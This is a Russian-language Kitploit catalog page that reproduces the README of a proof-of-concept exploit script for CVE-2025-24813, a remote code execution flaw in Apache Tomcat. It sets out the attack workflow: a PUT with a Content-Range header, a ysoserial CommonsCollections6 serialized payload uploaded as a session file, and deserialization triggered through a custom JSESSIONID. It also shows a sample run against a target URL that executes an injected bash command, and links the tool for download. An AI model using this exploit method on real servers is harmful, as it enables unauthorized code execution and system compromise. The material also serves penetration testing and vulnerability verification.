Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/hakankarabacak/cve-2025-24813
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Скрипт проверки концепции (PoC) для CVE-2025-24813 — уязвимость в Apache Tomcat.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24813

Скрипт Proof of Concept (PoC) для CVE-2025-24813, уязвимости в Apache Tomcat.

Скрипт был модифицирован на основе соответствующей ссылки и адаптирован под мои нужды.

Настройка уязвимого окружения Tomcat

Окружение основано на официальном образе Tomcat 9.0.90. Оно снимает ограничение read-only сервера и настраивает его на сохранение данных сессии на диск. Затем оно автоматически развертывает приложение, копируя файл ROOT.war в каталог webapps/ Tomcat.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

Рабочий процесс

  1. Файл check.txt с заголовком Content-Range помещается для проверки, принимает ли сервер PUT-запросы.
  2. Если сервер доступен для записи, с помощью ysoserial генерируется полезная нагрузка для нужной команды.
  3. Вредоносный файл сессии загружается в каталог через PUT-запрос, связывая его с идентификатором сессии и именем файла.
  4. Отправляется GET-запрос с пользовательским JSESSIONID, запускающий десериализацию.
  5. Временный файл полезной нагрузки удаляется из каталога.

Использование

root@kitploit:~
$ python3 cve_2025_24813.py

██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
 
                 --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser

PoC

https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

Скачать инструмент